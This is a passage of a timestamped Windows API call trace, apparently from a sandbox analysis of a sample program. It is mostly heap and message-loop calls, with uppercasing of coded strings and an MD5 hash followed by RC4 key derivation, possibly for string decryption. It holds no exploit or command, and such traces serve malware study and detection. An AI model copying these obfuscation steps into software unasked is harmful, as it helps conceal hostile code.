lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0197.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0197.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0197.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0197.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0197.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0197.019] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0197.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0197.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0197.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0197.020] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0197.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0197.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0197.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0197.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0197.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0197.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0197.020] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0197.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0197.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0197.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0197.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0197.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0197.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0197.020] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0197.020] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0197.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0197.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0197.021] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0197.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0197.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa170 [0197.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0197.021] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0197.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0197.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0197.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0197.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0197.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0197.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0197.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0197.021] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0197.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0197.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0197.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0197.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0197.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0197.022] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0197.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0197.022] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0197.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0197.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0197.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0197.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0197.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0197.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0197.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0197.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0197.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0197.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0197.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0197.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0197.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0197.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0197.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0197.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0197.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0197.023] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0197.023] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.023] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0197.023] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.023] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0197.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0197.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0197.024] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0197.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0197.024] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0197.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0197.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0197.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0197.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0197.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0197.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0197.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0197.024] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.024] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0197.024] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.024] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0197.024] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.024] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0197.025] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.025] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0197.025] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.025] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.025] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.025] CryptCreateHash (in: hProv=0xad6480, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0197.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.025] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0197.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.060] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0197.060] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.060] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0197.060] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.060] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.060] CryptHashData (hHash=0xaa5660, pbData=0x24b1368, dwDataLen=0x3, dwFlags=0x1) returned 1 [0197.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.060] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0197.060] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.060] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0197.060] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.060] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.060] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0197.060] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.061] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0197.061] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.061] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.061] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.061] CryptDeriveKey (in: hProv=0xad6480, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0197.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0197.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0197.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0197.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0197.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0197.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0197.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0197.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0197.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0197.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0197.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0197.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0197.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0197.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0197.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0197.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0197.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0197.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0197.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0197.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0197.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0197.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0197.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0197.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0197.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0197.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0197.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0197.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0197.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0197.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0197.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0197.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0197.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0197.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0197.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0197.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0197.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: 